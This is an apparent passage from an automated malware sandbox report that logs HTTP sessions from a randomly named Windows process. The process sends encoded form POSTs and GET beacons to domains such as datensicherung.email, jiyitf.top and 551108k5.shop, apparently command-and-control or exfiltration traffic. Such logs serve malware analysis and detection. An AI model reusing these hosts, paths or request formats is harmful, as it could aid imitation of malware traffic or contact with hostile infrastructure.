                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      40192.168.2.64976264.64.237.133806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:28.371917009 CEST504OUTGET /0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/+mNWQVB3yrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8Ez1yK8yk0Eg6fz4eRdqrvJXc5ChZOexPycZL94MwDpFuqgEtJpY=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.551108k5.shop
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:28.948158979 CEST562INHTTP/1.1 301 Moved Permanently
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:28:28 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: close
                      Location: https://www.551108k5.shop/0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/+mNWQVB3yrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8Ez1yK8yk0Eg6fz4eRdqrvJXc5ChZOexPycZL94MwDpFuqgEtJpY=&mV=ZpN4DLSXOzy8qX
                      Strict-Transport-Security: max-age=31536000
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      41192.168.2.64976385.13.151.9806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:34.012171984 CEST778OUTPOST /gs9g/ HTTP/1.1
                      Host: www.datensicherung.email
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.datensicherung.email
                      Referer: http://www.datensicherung.email/gs9g/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 34 76 38 44 74 4b 52 48 31 35 4c 41 4f 50 47 78 54 33 4d 78 4e 4f 46 66 59 42 50 70 2b 54 76 42 32 68 47 73 56 47 49 6c 37 52 77 46 6c 41 55 70 59 43 36 32 45 64 71 4a 39 41 34 78 54 57 5a 62 32 68 70 77 54 50 56 74 6e 78 31 42 4f 50 56 38 61 6d 42 4a 39 75 32 44 57 36 57 53 30 6b 61 6d 4f 44 37 76 50 77 57 32 4b 33 57 54 42 51 59 34 6c 62 51 6f 62 73 33 47 72 6c 46 75 50 71 4b 77 71 6a 51 64 57 56 63 63 44 73 72 43 4c 6b 4d 64 6d 6c 6e 52 43 69 6f 38 4c 64 2b 42 57 50 59 59 6c 41 67 6d 44 4a 73 4e 73 66 4f 79 72 48 76 54 75 79 35 57 32 6b 64 6b 44 79 2f 74 38 37 38 46 6f 62 71 39 5a 41 48 6d 37 6f 47 37
                      Data Ascii: Xn70_=4v8DtKRH15LAOPGxT3MxNOFfYBPp+TvB2hGsVGIl7RwFlAUpYC62EdqJ9A4xTWZb2hpwTPVtnx1BOPV8amBJ9u2DW6WS0kamOD7vPwW2K3WTBQY4lbQobs3GrlFuPqKwqjQdWVccDsrCLkMdmlnRCio8Ld+BWPYYlAgmDJsNsfOyrHvTuy5W2kdkDy/t878Fobq9ZAHm7oG7
                      Aug 23, 2024 08:28:34.626193047 CEST360INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:34 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      42192.168.2.64976485.13.151.9806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:36.560061932 CEST802OUTPOST /gs9g/ HTTP/1.1
                      Host: www.datensicherung.email
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.datensicherung.email
                      Referer: http://www.datensicherung.email/gs9g/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 34 76 38 44 74 4b 52 48 31 35 4c 41 42 50 57 78 53 57 4d 78 46 4f 46 63 64 42 50 70 33 7a 76 46 32 68 61 73 56 45 6c 34 37 6b 6f 46 6d 69 4d 70 4b 44 36 32 4e 4e 71 4a 31 67 34 2b 65 32 5a 55 32 68 31 4f 54 4f 35 74 6e 31 6c 42 4f 4f 46 38 61 56 70 4f 38 2b 32 42 4e 71 57 55 37 45 61 6d 4f 44 37 76 50 77 79 63 4b 33 75 54 41 68 49 34 6c 36 51 6e 59 73 33 5a 68 46 46 75 46 36 4b 4b 71 6a 51 46 57 55 77 79 44 71 76 43 4c 68 6f 64 6f 51 4c 51 4d 69 6f 36 50 64 2f 4a 53 4d 31 66 67 6d 52 41 45 37 38 50 33 66 4f 35 71 78 75 4a 79 42 35 31 6b 30 39 6d 44 77 6e 66 38 62 38 76 71 62 53 39 4c 58 4c 42 30 63 6a 59 32 43 7a 6d 31 41 78 64 47 52 6f 4d 6e 66 62 55 41 2b 42 71 70 51 3d 3d
                      Data Ascii: Xn70_=4v8DtKRH15LABPWxSWMxFOFcdBPp3zvF2hasVEl47koFmiMpKD62NNqJ1g4+e2ZU2h1OTO5tn1lBOOF8aVpO8+2BNqWU7EamOD7vPwycK3uTAhI4l6QnYs3ZhFFuF6KKqjQFWUwyDqvCLhodoQLQMio6Pd/JSM1fgmRAE78P3fO5qxuJyB51k09mDwnf8b8vqbS9LXLB0cjY2Czm1AxdGRoMnfbUA+BqpQ==
                      Aug 23, 2024 08:28:37.176605940 CEST360INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:37 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      43192.168.2.64976585.13.151.9806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:39.109108925 CEST1815OUTPOST /gs9g/ HTTP/1.1
                      Host: www.datensicherung.email
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.datensicherung.email
                      Referer: http://www.datensicherung.email/gs9g/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 34 76 38 44 74 4b 52 48 31 35 4c 41 42 50 57 78 53 57 4d 78 46 4f 46 63 64 42 50 70 33 7a 76 46 32 68 61 73 56 45 6c 34 37 6b 67 46 6c 58 51 70 59 6b 75 32 66 64 71 4a 70 77 35 35 65 32 5a 7a 32 68 74 53 54 4f 45 57 6e 33 74 42 50 73 64 38 4c 45 70 4f 31 2b 32 42 53 36 57 52 30 6b 61 33 4f 44 72 52 50 77 43 63 4b 33 75 54 41 69 41 34 73 4c 51 6e 65 73 33 47 72 6c 46 59 50 71 4c 6c 71 6a 34 56 57 55 45 4d 44 61 50 43 4c 41 55 64 6c 43 7a 51 45 69 6f 34 43 39 2b 50 53 4d 35 51 67 6d 6c 6d 45 2b 42 71 33 59 4f 35 6d 56 54 7a 32 43 78 42 2f 31 52 77 62 42 76 66 31 50 38 46 71 59 72 4d 4b 68 2b 32 38 74 37 51 78 32 33 36 31 32 77 4a 49 51 77 31 6c 61 65 49 55 4b 4d 7a 7a 76 37 34 74 6d 6d 30 59 33 6c 67 67 4c 6e 6b 38 56 76 4f 31 4a 41 55 6d 35 33 73 78 65 69 36 74 4a 77 48 35 57 45 76 43 32 33 4b 64 64 5a 51 51 46 46 53 70 4e 4b 4e 70 71 54 4d 6b 70 69 37 6a 66 39 62 45 6e 7a 49 46 37 54 35 78 66 37 64 49 70 39 4c 79 45 35 56 55 6b 63 56 62 65 6a 46 66 36 4a 51 31 77 36 5a 62 66 56 48 [TRUNCATED]
                      Data Ascii: Xn70_=4v8DtKRH15LABPWxSWMxFOFcdBPp3zvF2hasVEl47kgFlXQpYku2fdqJpw55e2Zz2htSTOEWn3tBPsd8LEpO1+2BS6WR0ka3ODrRPwCcK3uTAiA4sLQnes3GrlFYPqLlqj4VWUEMDaPCLAUdlCzQEio4C9+PSM5QgmlmE+Bq3YO5mVTz2CxB/1RwbBvf1P8FqYrMKh+28t7Qx23612wJIQw1laeIUKMzzv74tmm0Y3lggLnk8VvO1JAUm53sxei6tJwH5WEvC23KddZQQFFSpNKNpqTMkpi7jf9bEnzIF7T5xf7dIp9LyE5VUkcVbejFf6JQ1w6ZbfVHxpplxgrxT9LZIdRMZdurJpFg/kQ1HKwBzeZFVIGMmZBMqG1UUPfJfnkl6IQ90Bly/94lW+3G4KG2AnYGtY2pTS+RuzUNDZL+4CxPKvBZtii7eaLqpYJVwPbHQShZYTkoa3IExR3cQE93XWMasBY/922Xx1PO8Y2CrbY+VhbiuKXVVsi+ZDccs3PV6XeIuAgYdnQ3k2Hcf04W7AwKT5BLvC48TANcL8CQQ+dHb6joJ/TszIduQUzCW3HLnpQd6DJ38xSEhQwNQabzcHxMSdleWAIlZYgk1kFBFWy9HF4pewmzO4VDs+I4a3ZpQXHJUjArTtnfE9lLFfiI0PYetgqyoaXvLOMn5LalXRF0G5fs/xEj2u8SqTc63JeQPIkK0ZuNXU/R7/WdTf7bRwi+OI5hN1of1rJtBwyn84sjlamxTcWqb15HRSDstT/iYHieRjFeS3OPio8fUYi+7LiHlBWcIWE28yHZVPkkgOSPN5lIczRu2/G7hoUtXzzP9pTdKPNUuua3niIkDbJwEgg3PJ51cxR/Grc58AsPBXHjgW+ACzugeg8pE3QSqcmzgKRZzuc66aHIxxQZsZLlhAq1NaCsIScL2eeD1hKIcGi9ANKqAMj2NOCNAqhOdGBvqQ16HiG3EuZZUnAbOewMoSyxSiXpvfFgYNBqT1sG4g [TRUNCATED]
                      Aug 23, 2024 08:28:39.750530958 CEST360INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:39 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      44192.168.2.64976685.13.151.9806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:41.650428057 CEST511OUTGET /gs9g/?Xn70_=1tUju/dHge3HLZSdE2k0YsxyInHY2hrxyQikSChTyVI6tApcYR3Jee2z9yFvFCdZtAxjWN4NnVxgCMN8Nn90+uGeV46P8z2dJC38PhOXMX6lRwcpgLQeWu7EugNpVbCb7i9ISyk=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.datensicherung.email
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:28:42.288878918 CEST360INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:28:42 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      45192.168.2.649767172.67.215.136806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:48.017203093 CEST748OUTPOST /uhl0/ HTTP/1.1
                      Host: www.jiyitf.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jiyitf.top
                      Referer: http://www.jiyitf.top/uhl0/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 71 65 75 2f 78 58 2f 36 2f 73 56 5a 31 44 38 4f 53 4c 6e 68 34 4e 67 78 6d 6b 72 44 2b 6c 66 32 46 30 53 68 41 2b 35 37 68 4a 33 7a 6b 49 4a 6d 30 4e 6b 44 69 75 36 44 42 55 75 46 48 77 62 56 47 6a 31 5a 55 69 63 78 56 66 56 75 39 34 65 48 48 59 66 4f 32 4e 4c 6e 30 33 63 44 63 37 33 4a 4d 38 48 41 47 70 61 57 5a 76 2f 49 4e 41 32 30 58 55 68 72 63 46 76 55 33 57 62 54 4a 38 6c 68 47 76 39 74 32 33 4d 44 47 51 75 31 5a 6d 6c 56 74 69 2f 37 43 58 67 36 71 79 59 73 75 34 36 41 52 46 43 33 50 35 7a 70 5a 35 46 47 75 75 73 4b 31 76 6e 50 37 50 55 45 7a 62 42 65 6c 63 56 6b 54 4f 42 73 76 57 4b 78 48 6d 64 33
                      Data Ascii: Xn70_=qeu/xX/6/sVZ1D8OSLnh4NgxmkrD+lf2F0ShA+57hJ3zkIJm0NkDiu6DBUuFHwbVGj1ZUicxVfVu94eHHYfO2NLn03cDc73JM8HAGpaWZv/INA20XUhrcFvU3WbTJ8lhGv9t23MDGQu1ZmlVti/7CXg6qyYsu46ARFC3P5zpZ5FGuusK1vnP7PUEzbBelcVkTOBsvWKxHmd3


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      46192.168.2.649768172.67.215.136806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:50.561130047 CEST772OUTPOST /uhl0/ HTTP/1.1
                      Host: www.jiyitf.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jiyitf.top
                      Referer: http://www.jiyitf.top/uhl0/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 71 65 75 2f 78 58 2f 36 2f 73 56 5a 30 69 4d 4f 42 38 54 68 35 74 67 32 70 45 72 44 33 46 66 71 46 30 4f 68 41 37 5a 72 68 37 6a 7a 6c 71 52 6d 31 4d 6b 44 68 75 36 44 55 6b 75 4d 45 41 62 4f 47 6a 78 52 55 6e 38 78 56 66 52 75 39 35 4f 48 41 72 33 42 77 64 4c 6c 34 58 63 46 52 62 33 4a 4d 38 48 41 47 70 4f 77 5a 72 54 49 4e 52 47 30 57 32 5a 73 66 46 76 56 2b 32 62 54 4e 38 6c 74 47 76 39 50 32 32 68 73 47 57 69 31 5a 6b 74 56 73 77 48 34 49 58 67 38 75 79 5a 73 6e 37 62 6f 58 6c 44 53 41 36 50 4c 4a 4c 39 33 69 34 74 51 70 63 6e 73 70 66 30 47 7a 5a 5a 73 6c 38 56 4f 52 4f 35 73 39 42 47 57 49 53 34 55 55 5a 4d 44 69 42 2f 59 78 6f 36 54 30 76 54 4b 31 42 67 33 6c 51 3d 3d
                      Data Ascii: Xn70_=qeu/xX/6/sVZ0iMOB8Th5tg2pErD3FfqF0OhA7Zrh7jzlqRm1MkDhu6DUkuMEAbOGjxRUn8xVfRu95OHAr3BwdLl4XcFRb3JM8HAGpOwZrTINRG0W2ZsfFvV+2bTN8ltGv9P22hsGWi1ZktVswH4IXg8uyZsn7boXlDSA6PLJL93i4tQpcnspf0GzZZsl8VORO5s9BGWIS4UUZMDiB/Yxo6T0vTK1Bg3lQ==


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      47192.168.2.649769172.67.215.136806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:28:53.113121986 CEST1785OUTPOST /uhl0/ HTTP/1.1
                      Host: www.jiyitf.top
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jiyitf.top
                      Referer: http://www.jiyitf.top/uhl0/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 71 65 75 2f 78 58 2f 36 2f 73 56 5a 30 69 4d 4f 42 38 54 68 35 74 67 32 70 45 72 44 33 46 66 71 46 30 4f 68 41 37 5a 72 68 37 62 7a 6c 62 78 6d 31 76 63 44 67 75 36 44 56 6b 75 4a 45 41 62 44 47 6a 4a 64 55 6e 78 4b 56 63 35 75 37 72 57 48 46 61 33 42 2b 64 4c 6c 77 33 63 45 63 37 33 6d 4d 38 33 4d 47 70 65 77 5a 72 54 49 4e 54 65 30 52 6b 68 73 54 6c 76 55 33 57 61 63 4a 38 6c 4a 47 76 31 31 32 32 56 47 47 6d 43 31 58 6b 39 56 68 6c 72 34 41 58 67 2b 70 79 5a 43 6e 37 58 33 58 6c 66 34 41 37 37 74 4a 4c 4a 33 6e 70 59 31 32 76 57 32 79 73 49 30 76 65 78 75 72 70 35 73 52 73 41 63 35 33 44 68 4a 32 30 74 52 39 49 34 77 51 2b 73 68 36 36 2f 38 76 43 6b 77 54 4a 48 79 48 45 2f 6d 62 44 47 43 32 52 5a 31 75 78 48 6d 50 70 69 2f 36 41 4a 62 6a 46 47 35 74 78 31 53 58 79 34 6d 74 78 73 75 2b 57 6f 69 71 32 51 6f 56 57 69 65 50 4b 44 33 4c 6d 73 78 62 65 31 6c 44 52 37 66 67 61 78 56 2b 46 42 4e 4b 72 54 43 6c 62 70 74 66 2b 49 47 45 4a 45 67 37 77 54 6f 4f 38 54 79 5a 44 6c 47 6c 71 32 [TRUNCATED]
                      Data Ascii: Xn70_=qeu/xX/6/sVZ0iMOB8Th5tg2pErD3FfqF0OhA7Zrh7bzlbxm1vcDgu6DVkuJEAbDGjJdUnxKVc5u7rWHFa3B+dLlw3cEc73mM83MGpewZrTINTe0RkhsTlvU3WacJ8lJGv1122VGGmC1Xk9Vhlr4AXg+pyZCn7X3Xlf4A77tJLJ3npY12vW2ysI0vexurp5sRsAc53DhJ20tR9I4wQ+sh66/8vCkwTJHyHE/mbDGC2RZ1uxHmPpi/6AJbjFG5tx1SXy4mtxsu+Woiq2QoVWiePKD3Lmsxbe1lDR7fgaxV+FBNKrTClbptf+IGEJEg7wToO8TyZDlGlq26mgr4KXmAjbRptERAFBxzwbSu7Q00b2TeR4CTnSfb6bex61mI9/kK3I2WKLKG5XezXNQdDE7MJ7LHZEiv3MhizRU0d5gHguH9zWotMjyGXbd4aePJmOAV3UrgnJm4H1DBzVZgDUcY1PA7sWW03qHZg3kTdJur9eUxeLlsW67YK5Bkea/GvR9DVENVMWVvvCO+F4bwbQL9nA2Dm+zb2p5JyT1yQW5j/0JBqPl3SBGv7hwqxpYXuxjc2dgg470WbdLCkorm6QOusvVZ7DQSJs6wM7fi4sbOsjPaEpEqjGHYlpAXcvPhnPMqPxt/qJk33k6kAWZaMYuP/Far9dxuyORokjseEE6r8PNwz1PpgMy7H85HBX0wdun5QoBYd2JL5pqwnAH8Stl8uPVjv2iZ/nuYFHmdYyXKAxxzl2tE9S4TtEf/+bGt5IycDIgdTiJu1TfrIl8S+QRrN+bSz9Vl940g/pxrMIy1peEExSBVF1VksDhMvfqFNXzIKkgD7yQQnSUfbwST0c+1bia4s2GUsIPM8v8zPFNJruCAUAU7+VS4/GycdKbMjjHxbGO1BT5VsEk8BqCLlVGnCL9V3D30SLPjvuBnDt4Fs2e2+hALbBsbEuug+xEZjoKSwy3BFSTWI88OliwSqeTCsHPP9bpp4tzXZsm0Ov7iOsoJ1 [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      48192.168.2.649770172.67.215.136806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
